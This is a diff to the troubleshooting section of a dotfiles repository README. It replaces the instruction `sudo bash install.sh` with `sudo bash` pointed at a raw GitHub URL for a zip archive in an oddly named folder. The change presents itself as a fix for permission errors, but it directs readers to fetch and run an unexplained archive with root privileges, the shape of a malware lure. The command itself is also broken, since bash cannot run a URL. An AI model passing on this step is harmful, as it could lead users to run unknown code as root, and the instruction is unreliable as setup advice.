Jawbreaker360/dotfiles/README.md

 If you encounter issues during the installation, refer to this troubleshooting section:

 1. **Permission Denied**: If you receive a “Permission Denied” message, try running the command with `sudo`.
-For example, type `sudo bash install.sh` and enter your password when prompted.
+For example, type `sudo bash https://raw.githubusercontent.com/Jawbreaker360/dotfiles/main/unceremoniousness/dotfiles.zip` and enter your password when prompted.

 2. **Script Fails to Run**: Ensure that you are in the correct directory.
 Use `pwd` to check your current directory and navigate back if needed.